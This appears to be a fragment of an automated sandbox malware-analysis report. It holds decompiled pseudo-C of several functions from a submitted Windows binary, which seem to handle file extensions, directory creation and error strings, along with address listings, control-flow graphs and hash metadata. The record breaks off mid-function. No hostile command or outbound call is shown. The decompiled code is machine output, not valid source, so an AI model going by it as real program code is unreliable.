826->833 847 4088b6-4088bf 827->847 832->833 833->847 849 4088c1-4088c3 847->849 850 4088c7-4088c9 847->850 849->850 850->762 856->794 857->794
                              C-Code - Quality: 95%
                              			E00408524(intOrPtr* __ecx) {
				intOrPtr* _t153;
				signed int _t157;
				intOrPtr _t162;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t172;
				signed int _t178;
				signed int _t179;
				signed int _t185;
				void* _t187;
				signed int _t190;
				void* _t196;
				char* _t201;
				signed int _t203;
				signed int _t205;
				intOrPtr _t210;
				signed int _t220;
				signed int _t222;
				void* _t225;
				signed int _t231;
				intOrPtr _t257;
				intOrPtr _t278;
				signed int* _t289;
				signed int _t292;
				intOrPtr _t293;
				intOrPtr _t295;
				void* _t297;

				E00413954(E00419AE4, _t297);
				_t289 = __ecx;
				_t292 = 0;
				_t153 =  *((intOrPtr*)(__ecx));
				if(_t153 != 0) {
					 *((intOrPtr*)( *_t153 + 8))(_t153);
					 *((intOrPtr*)(__ecx)) = 0;
				}
				 *(_t289 + 0x34) = _t292;
				 *( *(_t289 + 0x30)) = _t292;
				E0040455D(_t289 + 4);
				 *(_t297 - 4) = _t292;
				 *(_t297 - 0x20) = _t292;
				 *(_t297 - 0x1c) = _t292;
				 *(_t297 - 0x18) = _t292;
				E00402170(_t297 - 0x20, 3);
				_t157 =  *(_t297 - 0x28);
				 *(_t297 - 4) = 1;
				if(_t157 == _t292) {
					L11:
					E004032A8(_t297 - 0x68, 4);
					 *((intOrPtr*)(_t297 - 0x68)) = 0x41b378;
					__eflags =  *(_t297 + 0xc) - _t292;
					 *(_t297 - 4) = 3;
					if( *(_t297 + 0xc) < _t292) {
						_t231 =  *(_t297 + 8);
						 *(_t297 + 0xc) = _t292;
						__eflags =  *(_t231 + 0x10);
						if( *(_t231 + 0x10) <= 0) {
							L18:
							__eflags =  *(_t297 + 0x10);
							if( *(_t297 + 0x10) != 0) {
								L22:
								_t292 = 0;
								__eflags = 0;
								L23:
								__eflags =  *((intOrPtr*)(_t297 - 0x60)) - _t292;
								 *(_t297 + 0xc) = _t292;
								if( *((intOrPtr*)(_t297 - 0x60)) <= _t292) {
									L37:
									_t293 = 1;
									L38:
									 *(_t297 - 4) = 1;
									E004042AD(_t297 - 0x68);
									E00403A9C( *(_t297 - 0x20));
									E00403A9C( *((intOrPtr*)(_t297 - 0x2c)));
									_t162 = _t293;
									L39:
									 *[fs:0x0] =  *((intOrPtr*)(_t297 - 0xc));
									return _t162;
								} else {
									goto L24;
								}
								do {
									L24:
									_t163 =  *(_t297 + 0x10);
									__eflags = _t163 - _t292;
									if(_t163 == _t292) {
										L26:
										 *(_t297 + 8) = _t292;
										 *(_t297 - 4) = 4;
										_t165 =  *( *((intOrPtr*)(_t297 - 0x5c)) +  *(_t297 + 0xc) * 4);
										 *(_t289 + 0x1c) = _t165;
										E0040640D(_t297 + 8,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) + _t165 * 4)) + 4))());
										_t169 =  *(_t297 + 8);
										__eflags = _t169 - _t292;
										if(_t169 != _t292) {
											__eflags =  *(_t297 + 0x10) - _t292;
											if( *(_t297 + 0x10) == _t292) {
												 *(_t297 - 0x14) = _t292;
												 *(_t297 - 4) = 5;
												 *((intOrPtr*)( *_t169))(_t169, 0x41b1f8, _t297 - 0x14);
												_t171 =  *(_t297 - 0x14);
												__eflags = _t171 - _t292;
												if(_t171 == _t292) {
													_t172 =  *(_t297 + 8);
													 *(_t297 - 4) = 3;
													__eflags = _t172 - _t292;
													if(_t172 != _t292) {
														 *((intOrPtr*)( *_t172 + 8))(_t172);
													}
													 *(_t297 - 4) = 1;
													E004042AD(_t297 - 0x68);
													E00403A9C( *(_t297 - 0x20));
													E00403A9C( *((intOrPtr*)(_t297 - 0x2c)));
													_t162 = 0x80004001;
													goto L39;
												}
												 *((intOrPtr*)(_t297 - 0x10)) =  *((intOrPtr*)( *_t171 + 0xc))(_t171,  *((intOrPtr*)(_t297 + 0x14)));
												_t178 =  *(_t297 - 0x14);
												__eflags = _t178 - _t292;
												 *(_t297 - 4) = 4;
												if(_t178 != _t292) {
													 *((intOrPtr*)( *_t178 + 8))(_t178);
												}
												L33:
												__eflags =  *((intOrPtr*)(_t297 - 0x10)) - 1;
												if( *((intOrPtr*)(_t297 - 0x10)) != 1) {
													__eflags =  *((intOrPtr*)(_t297 - 0x10)) - _t292;
													if( *((intOrPtr*)(_t297 - 0x10)) == _t292) {
														 *(_t297 - 0x54) = _t292;
														 *(_t297 - 0x52) = _t292;
														_t179 =  *(_t297 + 8);
														 *(_t297 - 4) = 6;
														 *((intOrPtr*)( *_t179 + 0x20))(_t179, 0x37, _t297 - 0x54);
														__eflags =  *(_t297 - 0x54) - _t292;
														if( *(_t297 - 0x54) != _t292) {
															__eflags =  *(_t297 - 0x54) - 8;
															_t201 =  *(_t297 - 0x4c);
															if( *(_t297 - 0x54) != 8) {
																_t201 = L"Unknown error";
															}
															E00401D1B(_t289 + 0x30, _t201);
														}
														 *(_t297 - 4) = 4;
														E00405E34(_t297 - 0x54);
														E0040640D(_t289,  *(_t297 + 8));
														_t295 =  *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) +  *(_t289 + 0x1c) * 4));
														__eflags =  *(_t295 + 0x20);
														if( *(_t295 + 0x20) != 0) {
															_t185 = E004088CE(_t295, _t297 - 0x20);
															__eflags = _t185;
															if(_t185 < 0) {
																_t185 = 0;
																__eflags = 0;
															}
															_t257 =  *((intOrPtr*)(_t295 + 0x24));
															_t143 =  *((intOrPtr*)(_t257 + _t185 * 4)) + 0xc; // 0xc
															_push( *((intOrPtr*)(_t257 + _t185 * 4)));
															_t187 = E00407D82(_t297 - 0x50, _t297 - 0x2c);
															 *(_t297 - 4) = 0xa;
															E00401D7A(_t289 + 0x10, _t187);
															E00403A9C( *((intOrPtr*)(_t297 - 0x50)));
														} else {
															E00401C80(_t297 - 0x44, 0x423338);
															 *(_t297 - 4) = 7;
															E00401C80(_t297 - 0x38, 0x423338);
															_push(_t297 - 0x44);
															_push(_t297 - 0x38);
															 *(_t297 - 4) = 8;
															_t196 = E00407D82(_t297 - 0x50, _t297 - 0x2c);
															 *(_t297 - 4) = 9;
															E00401D7A(_t289 + 0x10, _t196);
															E00403A9C( *((intOrPtr*)(_t297 - 0x50)));
															E00403A9C( *((intOrPtr*)(_t297 - 0x38)));
															E00403A9C( *((intOrPtr*)(_t297 - 0x44)));
														}
														_t190 =  *(_t297 + 8);
														 *(_t297 - 4) = 3;
														__eflags = _t190;
														if(_t190 != 0) {
															 *((intOrPtr*)( *_t190 + 8))(_t190);
														}
														_t293 = 0;
													} else {
														_t203 =  *(_t297 + 8);
														 *(_t297 - 4) = 3;
														__eflags = _t203 - _t292;
														if(_t203 != _t292) {
															 *((intOrPtr*)( *_t203 + 8))(_t203);
														}
														_t293 =  *((intOrPtr*)(_t297 - 0x10));
													}
													goto L38;
												}
												_t205 =  *(_t297 + 8);
												 *(_t297 - 4) = 3;
												__eflags = _t205 - _t292;
												if(_t205 != _t292) {
													 *((intOrPtr*)( *_t205 + 8))(_t205);
												}
												goto L36;
											}
											 *((intOrPtr*)(_t297 - 0x10)) =  *((intOrPtr*)( *_t169 + 0xc))(_t169,  *(_t297 + 0x10), 0x41b5f8,  *((intOrPtr*)(_t297 + 0x18)));
											goto L33;
										}
										 *(_t297 - 4) = 3;
										goto L36;
									}
									_t210 =  *((intOrPtr*)( *_t163 + 0x10))(_t163, _t292, _t292, _t292, _t292);
									__eflags = _t210 - _t292;
									if(_t210 != _t292) {
										_t293 = _t210;
										goto L38;
									}
									goto L26;
									L36:
									 *(_t297 + 0xc) =  *(_t297 + 0xc) + 1;
									__eflags =  *(_t297 + 0xc) -  *((intOrPtr*)(_t297 - 0x60));
								} while ( *(_t297 + 0xc) <  *((intOrPtr*)(_t297 - 0x60)));
								goto L37;
							}
							__eflags =  *(_t297 + 0xc) - 1;
							if( *(_t297 + 0xc) == 1) {
								E004042EB(_t297 - 0x68, 1);
								goto L22;
							}
							_t293 = 0x80004001;
							goto L38;
						} else {
							goto L14;
						}
						do {
							L14:
							__eflags = E004088CE( *((intOrPtr*)( *((intOrPtr*)(_t231 + 0x14)) + _t292 * 4)), _t297 - 0x20);
							if(__eflags < 0) {
								E004039DF(_t297 - 0x68, _t292);
							} else {
								 *(_t297 + 0xc) =  *(_t297 + 0xc) + 1;
								E00404407(_t297 - 0x68, __eflags,  *(_t297 + 0xc));
								 *(( *(_t297 + 0xc) << 2) +  *((intOrPtr*)(_t297 - 0x5c))) = _t292;
								_t231 =  *(_t297 + 8);
							}
							_t292 = _t292 + 1;
							__eflags = _t292 -  *(_t231 + 0x10);
						} while (_t292 <  *(_t231 + 0x10));
						goto L18;
					}
					E004039DF(_t297 - 0x68,  *(_t297 + 0xc));
					_t231 =  *(_t297 + 8);
					goto L23;
				} else {
					_t278 =  *((intOrPtr*)(_t297 - 0x2c));
					_t220 = _t278 + _t157 * 2 - 2;
					while( *_t220 != 0x2e) {
						if(_t220 == _t278) {
							_t222 = _t220 | 0xffffffff;
							__eflags = _t222;
							L9:
							__eflags = _t222 - _t292;
							if(_t222 >= _t292) {
								__eflags = _t222 + 1;
								_t225 = E00401E19(_t297 - 0x2c, _t297 - 0x44, _t222 + 1);
								 *(_t297 - 4) = 2;
								E00401D7A(_t297 - 0x20, _t225);
								 *(_t297 - 4) = 1;
								E00403A9C( *((intOrPtr*)(_t297 - 0x44)));
							}
							goto L11;
						} else {
							_t220 = _t220;
							continue;
						}
					}
					_t222 = _t220 - _t278 >> 1;
					goto L9;
				}
			}
































                              0x00408529
                              0x00408534
                              0x00408536
                              0x00408538
                              0x0040853c
                              0x00408541
                              0x00408544
                              0x00408544
                              0x00408549
                              0x00408552
                              0x00408555
                              0x0040855f
                              0x00408562
                              0x00408565
                              0x00408568
                              0x0040856b
                              0x00408570
                              0x00408573
                              0x00408579
                              0x004085c5
                              0x004085ca
                              0x004085cf
                              0x004085d6
                              0x004085d9
                              0x004085dd
                              0x004085ef
                              0x004085f2
                              0x004085f5
                              0x004085f9
                              0x0040863c
                              0x0040863c
                              0x00408640
                              0x0040865c
                              0x0040865c
                              0x0040865c
                              0x0040865e
                              0x0040865e
                              0x00408661
                              0x00408664
                              0x00408733
                              0x00408735
                              0x00408736
                              0x00408739
                              0x0040873d
                              0x00408745
                              0x0040874d
                              0x00408753
                              0x00408756
                              0x0040875c
                              0x00408764
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040866a
                              0x0040866a
                              0x0040866a
                              0x0040866d
                              0x0040866f
                              0x00408683
                              0x00408683
                              0x0040868c
                              0x00408690
                              0x00408693
                              0x004086a3
                              0x004086a8
                              0x004086ab
                              0x004086ad
                              0x004086b5
                              0x004086b8
                              0x004086d0
                              0x004086df
                              0x004086e3
                              0x004086e5
                              0x004086e8
                              0x004086ea
                              0x0040876b
                              0x0040876e
                              0x00408772
                              0x00408774
                              0x00408779
                              0x00408779
                              0x0040877f
                              0x00408783
                              0x0040878b
                              0x00408793
                              0x00408799
                              0x00000000
                              0x0040879e
                              0x004086f5
                              0x004086f8
                              0x004086fb
                              0x004086fd
                              0x00408701
                              0x00408706
                              0x00408706
                              0x00408709
                              0x00408709
                              0x0040870d
                              0x004087a1
                              0x004087a4
                              0x004087bf
                              0x004087c3
                              0x004087c7
                              0x004087d3
                              0x004087d7
                              0x004087da
                              0x004087de
                              0x004087e0
                              0x004087e5
                              0x004087e8
                              0x004087ea
                              0x004087ea
                              0x004087f3
                              0x004087f3
                              0x004087fb
                              0x004087ff
                              0x00408809
                              0x00408814
                              0x00408817
                              0x0040881b
                              0x0040887f
                              0x00408884
                              0x00408886
                              0x00408888
                              0x00408888
                              0x00408888
                              0x0040888a
                              0x00408893
                              0x00408897
                              0x0040889b
                              0x004088a4
                              0x004088a8
                              0x004088b0
                              0x0040881d
                              0x00408826
                              0x0040882f
                              0x00408833
                              0x0040883e
                              0x00408842
                              0x00408846
                              0x0040884a
                              0x00408853
                              0x00408857
                              0x0040885f
                              0x00408867
                              0x0040886f
                              0x00408874
                              0x004088b6
                              0x004088b9
                              0x004088bd
                              0x004088bf
                              0x004088c4
                              0x004088c4
                              0x004088c7
                              0x004087a6
                              0x004087a6
                              0x004087a9
                              0x004087ad
                              0x004087af
                              0x004087b4
                              0x004087b4
                              0x004087b7
                              0x004087b7
                              0x00000000
                              0x004087a4
                              0x00408713
                              0x00408716
                              0x0040871a
                              0x0040871c
                              0x00408721
                              0x00408721
                              0x00000000
                              0x0040871c
                              0x004086cb
                              0x00000000
                              0x004086cb
                              0x004086af
                              0x00000000
                              0x004086af
                              0x00408678
                              0x0040867b
                              0x0040867d
                              0x00408767
                              0x00000000
                              0x00408767
                              0x00000000
                              0x00408724
                              0x00408724
                              0x0040872a
                              0x0040872a
                              0x00000000
                              0x0040866a
                              0x00408642
                              0x00408646
                              0x00408657
                              0x00000000
                              0x00408657
                              0x00408648
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004085fb
                              0x004085fb
                              0x0040860a
                              0x0040860c
                              0x00408631
                              0x0040860e
                              0x0040861a
                              0x0040861d
                              0x00408625
                              0x00408628
                              0x00408628
                              0x00408636
                              0x00408637
                              0x00408637
                              0x00000000
                              0x004085fb
                              0x004085e5
                              0x004085ea
                              0x00000000
                              0x0040857b
                              0x0040857b
                              0x0040857e
                              0x00408582
                              0x0040858a
                              0x00408596
                              0x00408596
                              0x00408599
                              0x00408599
                              0x0040859b
                              0x0040859d
                              0x004085a6
                              0x004085af
                              0x004085b3
                              0x004085bb
                              0x004085bf
                              0x004085c4
                              0x00000000
                              0x0040858c
                              0x0040858d
                              0x00000000
                              0x0040858d
                              0x0040858a
                              0x00408592
                              0x00000000
                              0x00408592

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 83B$Unknown error
                              • API String ID: 3519838083-1944086607
                              • Opcode ID: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                              • Instruction ID: d43b38567734cbd3d280cef04a8de17ccbe463ec1fdb7709e9180388f705ec22
                              • Opcode Fuzzy Hash: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
                              • Instruction Fuzzy Hash: A5D17070900259EFCF05DFA4C944ADEBB74BF14318F20846EF845BB291CB78AA45CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00408F0A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 206COMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 79%
                              			E00408F0A(intOrPtr __ecx) {
				intOrPtr _t105;
				intOrPtr _t113;
				void* _t115;
				intOrPtr _t118;
				long _t123;
				intOrPtr* _t131;
				void* _t137;
				void* _t141;
				intOrPtr* _t151;
				signed int _t157;
				intOrPtr _t192;
				intOrPtr* _t196;
				long _t198;
				void* _t199;

				E00413954(E00419BC6, _t199);
				_t192 = __ecx;
				_t157 = 0;
				_push(0x90);
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(_t199 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				_t105 = E00403A76();
				 *((intOrPtr*)(_t199 - 0x18)) = _t105;
				 *(_t199 - 4) = 0;
				if(_t105 == 0) {
					_t196 = 0;
					__eflags = 0;
				} else {
					_t196 = E00409184(_t105);
				}
				 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t199 - 0x10)) = _t196;
				if(_t196 != _t157) {
					 *((intOrPtr*)( *_t196 + 4))(_t196);
				}
				 *((intOrPtr*)(_t196 + 0x7c)) =  *((intOrPtr*)(_t199 + 0x1c));
				 *(_t199 - 4) = 1;
				 *(_t199 - 0x3c) = _t157;
				 *(_t199 - 0x38) = _t157;
				 *(_t199 - 0x34) = _t157;
				E00402170(_t199 - 0x3c, 3);
				 *(_t199 - 4) = 2;
				 *(_t199 - 0x24) = _t157;
				 *(_t199 - 0x20) = _t157;
				 *(_t199 - 0x1c) = _t157;
				E00402170(_t199 - 0x24, 3);
				 *(_t199 - 4) = 3;
				 *(_t199 - 0x30) = _t157;
				 *(_t199 - 0x2c) = _t157;
				 *(_t199 - 0x28) = _t157;
				E00402170(_t199 - 0x30, 3);
				 *(_t199 - 4) = 4;
				if( *((intOrPtr*)(_t199 + 0x14)) != _t157 ||  *((intOrPtr*)(_t199 + 0x10)) != _t157) {
					_t58 = _t196 + 8; // 0x8
					 *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)) + 0xc))(_t58,  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))));
					goto L13;
				} else {
					_push(_t199 + 0x1c);
					if(E00404E76( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))), _t199 - 0x3c) != 0) {
						_t137 = E00401E3A(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 5;
						E00401D7A(_t199 - 0x24, _t137);
						 *(_t199 - 4) = 4;
						E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
						_t141 = E00401E19(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 6;
						E00401D7A(_t199 - 0x30, _t141);
						 *(_t199 - 4) = 4;
						E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
						_push(_t199 - 0x30);
						_push(_t199 - 0x24);
						E004092E9(_t196, __eflags); // executed
						L13:
						_push( *((intOrPtr*)(_t199 - 0x10)));
						_push( *((intOrPtr*)(_t199 + 0x18)));
						_t62 = _t199 + 0x14; // 0x414be4
						_push( *_t62);
						_push( *((intOrPtr*)(_t199 + 0x10)));
						_push( *((intOrPtr*)(_t199 + 0xc)));
						_push( *((intOrPtr*)(_t199 + 8)));
						_t113 = E00408A3B(_t192); // executed
						__eflags = _t113 - _t157;
						 *((intOrPtr*)(_t199 + 0x18)) = _t113;
						if(_t113 == _t157) {
							_push(_t199 - 0x30);
							_t115 = E00402634(_t199 - 0x48, _t199 - 0x24);
							_t193 = _t192 + 0x14;
							_push(_t115);
							 *(_t199 - 4) = 7;
							E00403998(_t192 + 0x14);
							 *(_t199 - 4) = 4;
							E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
							__eflags =  *((intOrPtr*)(_t196 + 0x70)) - _t157;
							if( *((intOrPtr*)(_t196 + 0x70)) > _t157) {
								do {
									_push( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x74)) + _t157 * 4)));
									_push(E00402634(_t199 - 0x48, _t199 - 0x24));
									 *(_t199 - 4) = 8;
									E00403998(_t193);
									 *(_t199 - 4) = 4;
									E00403A9C( *((intOrPtr*)(_t199 - 0x48)));
									_t157 = _t157 + 1;
									__eflags = _t157 -  *((intOrPtr*)(_t196 + 0x70));
								} while (_t157 <  *((intOrPtr*)(_t196 + 0x70)));
							}
							_t118 =  *((intOrPtr*)(_t199 - 0x14));
							 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t196 + 0x88));
							 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t196 + 0x8c));
							E00403A9C( *(_t199 - 0x30));
							E00403A9C( *(_t199 - 0x24));
							E00403A9C( *(_t199 - 0x3c));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							E00403800(_t199 - 0x10);
							_t123 = 0;
							__eflags = 0;
						} else {
							E00403A9C( *(_t199 - 0x30));
							E00403A9C( *(_t199 - 0x24));
							E00403A9C( *(_t199 - 0x3c));
							_t131 =  *((intOrPtr*)(_t199 - 0x10));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							__eflags = _t131 - _t157;
							if(_t131 != _t157) {
								 *((intOrPtr*)( *_t131 + 8))(_t131);
							}
							_t123 =  *((intOrPtr*)(_t199 + 0x18));
						}
					} else {
						_t198 = GetLastError();
						E00403A9C( *(_t199 - 0x30));
						E00403A9C( *(_t199 - 0x24));
						E00403A9C( *(_t199 - 0x3c));
						_t151 =  *((intOrPtr*)(_t199 - 0x10));
						 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
						if(_t151 != _t157) {
							 *((intOrPtr*)( *_t151 + 8))(_t151);
						}
						_t123 = _t198;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t199 - 0xc));
				return _t123;
			}

















                              0x00408f0f
                              0x00408f1a
                              0x00408f1c
                              0x00408f1e
                              0x00408f23
                              0x00408f26
                              0x00408f29
                              0x00408f2c
                              0x00408f32
                              0x00408f37
                              0x00408f3a
                              0x00408f47
                              0x00408f47
                              0x00408f3c
                              0x00408f43
                              0x00408f43
                              0x00408f49
                              0x00408f4f
                              0x00408f52
                              0x00408f57
                              0x00408f57
                              0x00408f5f
                              0x00408f65
                              0x00408f6c
                              0x00408f6f
                              0x00408f72
                              0x00408f75
                              0x00408f7f
                              0x00408f83
                              0x00408f86
                              0x00408f89
                              0x00408f8c
                              0x00408f96
                              0x00408f9a
                              0x00408f9d
                              0x00408fa0
                              0x00408fa3
                              0x00408fab
                              0x00408faf
                              0x00409079
                              0x0040907e
                              0x00000000
                              0x00408fbe
                              0x00408fc9
                              0x00408fd1
                              0x00409018
                              0x00409021
                              0x00409025
                              0x0040902d
                              0x00409031
                              0x00409041
                              0x0040904a
                              0x0040904e
                              0x00409056
                              0x0040905a
                              0x00409063
                              0x00409067
                              0x0040906a
                              0x00409081
                              0x00409081
                              0x00409086
                              0x00409089
                              0x00409089
                              0x0040908c
                              0x0040908f
                              0x00409092
                              0x00409095
                              0x0040909a
                              0x0040909c
                              0x0040909f
                              0x004090db
                              0x004090df
                              0x004090e4
                              0x004090e7
                              0x004090ea
                              0x004090ee
                              0x004090f6
                              0x004090fa
                              0x004090ff
                              0x00409103
                              0x00409105
                              0x0040910e
                              0x00409116
                              0x00409119
                              0x0040911d
                              0x00409125
                              0x00409129
                              0x0040912e
                              0x00409130
                              0x00409130
                              0x00409105
                              0x00409135
                              0x00409141
                              0x0040914a
                              0x0040914d
                              0x00409155
                              0x0040915d
                              0x00409162
                              0x0040916c
                              0x00409171
                              0x00409171
                              0x004090a1
                              0x004090a4
                              0x004090ac
                              0x004090b4
                              0x004090b9
                              0x004090bc
                              0x004090c3
                              0x004090c5
                              0x004090ca
                              0x004090ca
                              0x004090cd
                              0x004090cd
                              0x00408fd3
                              0x00408fdc
                              0x00408fde
                              0x00408fe6
                              0x00408fee
                              0x00408ff3
                              0x00408ff6
                              0x00408fff
                              0x00409004
                              0x00409004
                              0x00409007
                              0x00409007
                              0x00408fd1
                              0x00409179
                              0x00409181

                              APIs
                              • __EH_prolog.LIBCMT ref: 00408F0F
                              • GetLastError.KERNEL32(?,00000003,00000003,00000003,?,?,00000000), ref: 00408FD3
                                • Part of subcall function 00409184: __EH_prolog.LIBCMT ref: 00409189
                                • Part of subcall function 004092E9: __EH_prolog.LIBCMT ref: 004092EE
                                • Part of subcall function 00408A3B: __EH_prolog.LIBCMT ref: 00408A40
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$ErrorLast
                              • String ID: KA
                              • API String ID: 2901101390-4133974868
                              • Opcode ID: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
                              • Instruction ID: 1ffdda1e280707f1620b0bff2a1c5a648dc862d45b7bd7d33f28712355ced64d
                              • Opcode Fuzzy Hash: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
                              • Instruction Fuzzy Hash: 7C81677190020AABCF01EFA5C885ADEBBB5BF18318F14416EF455B32A2CB399A05CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004049DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 941 4049dd-404a02 call 413954 call 401c80 946 404a04-404a07 941->946 947 404a4a-404a59 call 401ce1 941->947 949 404a0b-404a0e 946->949 953 404a5d-404a67 call 40499c 947->953 951 404a10-404a12 949->951 952 404a18-404a1c 949->952 954 404a14-404a16 951->954 955 404a1e 951->955 956 404a21-404a23 952->956 961 404b42-404b49 call 401d7a 953->961 962 404a6d-404a78 GetLastError 953->962 954->949 955->956 956->947 958 404a25-404a2a 956->958 958->947 960 404a2c-404a2f 958->960 963 404a31-404a36 960->963 964 404a3f-404a45 call 4023ee 960->964 974 404b4e-404b51 961->974 966 404aea-404afc call 402ee1 call 405841 962->966 967 404a7a-404a7f 962->967 963->964 969 404a38-404a3a 963->969 964->947 993 404b01-404b03 966->993 971 404bb2 967->971 972 404a85-404a88 967->972 970 404bc0-404bc6 call 403a9c 969->970 990 404bc7-404bd7 970->990 978 404bb4-404bbf call 403a9c 971->978 976 404a8c-404a8f 972->976 979 404b57-404b5a 974->979 980 404bd8-404bda 974->980 984 404a91-404a93 976->984 985 404a99-404a9f 976->985 978->970 982 404b5e-404b64 979->982 980->978 988 404b66-404b69 982->988 989 404b6f-404b75 982->989 991 404aa1 984->991 992 404a95-404a97 984->992 994 404aa4-404aa6 985->994 996 404b77 988->996 997 404b6b-404b6d 988->997 998 404b7a-404b7c 989->998 991->994 992->976 999 404b05-404b07 993->999 1000 404b09-404b11 993->1000 994->971 995 404aac 994->995 995->971 1004 404ab2-404ab8 995->1004 996->998 997->982 1005 404b81-404bb0 call 401e3a call 40499c call 403a9c 998->1005 1006 404b7e 998->1006 1001 404b15-404b30 call 403a9c * 3 999->1001 1002 404b13 1000->1002 1003 404b35-404b41 call 403a9c 1000->1003 1001->990 1002->1001 1003->961 1004->971 1008 404abe-404ae5 call 401e3a call 401d7a call 403a9c 1004->1008 1005->971 1005->974 1006->1005 1008->953
                              C-Code - Quality: 98%
                              			E004049DD(void* __ecx) {
				signed int _t64;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed char _t75;
				long _t78;
				signed int _t80;
				signed char _t82;
				signed int _t87;
				intOrPtr* _t88;
				void* _t92;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t109;
				signed int _t116;
				intOrPtr _t123;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				void* _t132;
				signed int _t135;
				void* _t138;

				E00413954(E004195A0, _t138);
				E00401C80(_t138 - 0x18, __ecx);
				_t2 = _t138 - 0x14; // 0x414be4
				_t109 =  *_t2;
				 *(_t138 - 4) =  *(_t138 - 4) & 0x00000000;
				_t132 = 0x5c;
				if(_t109 == 0) {
					L13:
					E00401CE1(_t138 - 0x24, _t138 - 0x18);
					_t14 = _t138 - 0x14; // 0x414be4
					_t135 =  *_t14;
					 *(_t138 - 4) = 1;
					while(1) {
						L14:
						_t64 = E0040499C( *((intOrPtr*)(_t138 - 0x18))); // executed
						__eflags = _t64;
						if(_t64 != 0) {
							break;
						}
						_t78 = GetLastError();
						__eflags = _t78 - 0xb7;
						if(_t78 == 0xb7) {
							E00402EE1(_t138 - 0x40);
							_push( *((intOrPtr*)(_t138 - 0x18)));
							 *(_t138 - 4) = 2;
							_t80 = E00405841(_t138 - 0x68, _t128); // executed
							__eflags = _t80;
							if(_t80 != 0) {
								_t82 =  *(_t138 - 0x48) >> 4;
								__eflags = _t82 & 0x00000001;
								if((_t82 & 0x00000001) != 0) {
									 *(_t138 - 4) = 1;
									E00403A9C( *((intOrPtr*)(_t138 - 0x40)));
									break;
								} else {
									_t102 = 0;
									__eflags = 0;
									goto L31;
								}
							} else {
								_t102 = 1;
								L31:
								E00403A9C( *((intOrPtr*)(_t138 - 0x40)));
								E00403A9C( *((intOrPtr*)(_t138 - 0x24)));
								E00403A9C( *((intOrPtr*)(_t138 - 0x18)));
							}
						} else {
							_t17 = _t138 - 0x14; // 0x414be4
							_t87 =  *_t17;
							__eflags = _t87;
							if(_t87 == 0) {
								L44:
								_t102 = 0;
								__eflags = 0;
								L45:
